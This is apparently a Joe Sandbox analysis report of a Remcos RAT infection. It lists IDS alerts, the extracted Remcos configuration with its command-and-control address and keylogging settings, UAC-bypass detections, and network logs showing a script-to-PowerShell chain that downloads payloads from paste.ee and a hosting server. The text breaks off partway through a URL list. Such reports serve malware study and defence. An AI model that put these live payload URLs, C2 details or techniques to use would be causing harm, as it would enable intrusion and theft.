ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T08:32:22.044508+0100	2020425	1	Exploit Kit Activity Detected	188.114.96.3	443	192.168.2.4	49738	TCP
2025-01-05T08:33:17.949804+0100	2020425	1	Exploit Kit Activity Detected	188.114.96.3	443	192.168.2.4	49903	TCP

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T08:32:22.044508+0100	2020424	1	Exploit Kit Activity Detected	188.114.96.3	443	192.168.2.4	49738	TCP
2025-01-05T08:33:17.949804+0100	2020424	1	Exploit Kit Activity Detected	188.114.96.3	443	192.168.2.4	49903	TCP

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T08:32:23.274116+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49739	195.133.78.18	7346	TCP
2025-01-05T08:32:24.461614+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49742	195.133.78.18	7346	TCP
2025-01-05T08:32:24.477278+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49741	195.133.78.18	7346	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T08:32:24.949379+0100	2803304	3	Unknown Traffic	192.168.2.4	49743	178.237.33.50	80	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T08:32:22.488684+0100	2858295	1	A Network Trojan was detected	188.114.96.3	443	192.168.2.4	49738	TCP
2025-01-05T08:33:18.385677+0100	2858295	1	A Network Trojan was detected	188.114.96.3	443	192.168.2.4	49903	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T08:32:21.867224+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49738	188.114.96.3	443	TCP
2025-01-05T08:33:17.776006+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49903	188.114.96.3	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-05T08:32:23.650440+0100	1810000	2	Potentially Bad Traffic	192.168.2.4	49740	160.153.175.102	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://102.175.153.160.host.secureserver.net	Avira URL Cloud: Label: phishing
Source: https://102.175.153.160.host.secureserver.net/file.js	Avira URL Cloud: Label: phishing
Source: http://102.175.153.160.host.secureserver.net	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 0000001B.00000002.2449621046.0000000000E08000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["195.133.78.18:7346:1"], "Assigned name": "chesguyce", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "fyhstga-ONSWMZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara detected Remcos RAT

Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2449621046.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8804, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

27_2_0043294A

Source: MSBuild.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 8804, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00406764 _wcslen,CoGetObject,

27_2_00406764

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 160.153.175.102:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49903 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,	12_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	15_2_00407898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	27_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	27_2_0041B43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	27_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	27_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00406AC2 FindFirstFileW,FindNextFileW,	27_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	27_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,	27_2_00418C79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 27_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	27_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

27_2_00406F06

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 29MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 195.133.78.18:7346
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 195.133.78.18:7346
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 195.133.78.18:7346
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 188.114.96.3:443 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.4:49903
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 188.114.96.3:443 -> 192.168.2.4:49903
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 188.114.96.3:443 -> 192.168.2.4:49903
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 188.114.96.3:443 -> 192.168.2.4:49738

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 188.114.96.3 443

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 195.133.78.18

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: global traffic

TCP traffic: 192.168.2.4:49739 -> 195.133.78.18:7346

Source: global traffic	HTTP traffic detected: GET /d/5VcuL/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/5VcuL/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: FLEX-ASRU FLEX-ASRU
Source: Joe Sandbox View	ASN Name: GODADDY-AMSDE GODADDY-AMSDE

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49743 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49740 -> 160.153.175.102:443
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49903 -> 188.114.96.3:443

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18
Source: unknown	TCP traffic detected without corresponding DNS query: 195.133.78.18

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 27_2_00426107 recv,

27_2_00426107

Source: global traffic	HTTP traffic detected: GET /d/snSm4 HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/5VcuL/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file.js HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 102.175.153.160.host.secureserver.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/DDqbU HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /d/5VcuL/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: MSBuild.exe	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: MSBuild.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: res.cloudinary.com
Source: global traffic	DNS traffic detected: DNS query: 102.175.153.160.host.secureserver.net
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message

Source: powershell.exe, 00000006.00000002.2125755339.000002E39141D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://102.175.153.160.host.secureserver.net
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect2
Source: MSBuild.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: MSBuild.exe, 0000001B.00000002.2444877297.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1887820190.00000272260C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2125755339.000002E390A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tls-tunnel-check.googlezip.net/connect2
Source: powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: MSBuild.exe	String found in binary or memory: http://www.ebuddy.com
Source: MSBuild.exe	String found in binary or memory: http://www.imvu.com
Source: MSBuild.exe	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000006.00000002.2125755339.000002E390E99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://102.175.153.160.host.sec
Source: powershell.exe, 00000006.00000002.2125755339.000002E390EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://102.175.153.160.host.secureserver.net
Source: powershell.exe, 00000006.00000002.2395082509.000002E3A8A49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://102.175.153.160.host.secureserver.net/file.js
Source: powershell.exe, 00000001.00000002.1887820190.00000272260C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2125755339.000002E390A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2125755339.000002E390A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000000.00000003.1658235921.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656064498.0000024B549ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromecontentsuggestions-pa.googleapis.com/v1/suggestions/fetch2
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromefeedcontentsuggestions-pa.googleapis.com/v2/suggestions/fetch26
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromefeedcontentsuggestions-pa.googleapis.com/v2/suggestions/fetchb
Source: chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000000B.00000003.1962847402.000029E001624000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1955212656.000029E0015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954717451.000029E00157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956901681.000029E00161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954640884.000029E00156C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1962977700.000029E001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1959222352.000029E001620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1955249369.000029E0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1956408450.000029E00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1951666580.000029E001470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromeupboarding-pa.googleapis.com2
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromeupboarding-pa.googleapis.com2P
Source: chrome.exe, 0000000B.00000003.1913300569.00004D48002D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-autofill.googleapis.com/b-
Source: chrome.exe, 0000000B.00000003.1926075173.000029E000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cuscochromeextension-pa.googleapis.com/v_turned_down_returns_404/omniboxsuggestionsb
Source: wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000002.1660167889.0000024B549F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660396457.0000024B54E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000001.00000002.1887820190.00000272262E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.2125755339.000002E390EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: chrome.exe, 0000000B.00000003.1951507573.000029E001454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000000B.00000003.1954122235.000029E001560000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/.
Source: chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
Source: chrome.exe, 0000000B.00000002.1994496575.000029E001E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000000B.00000003.1953877142.000029E001550000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
Source: chrome.exe, 0000000B.00000003.1953568037.000029E00154C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_S_Delay_GA4Kids_20230926_An
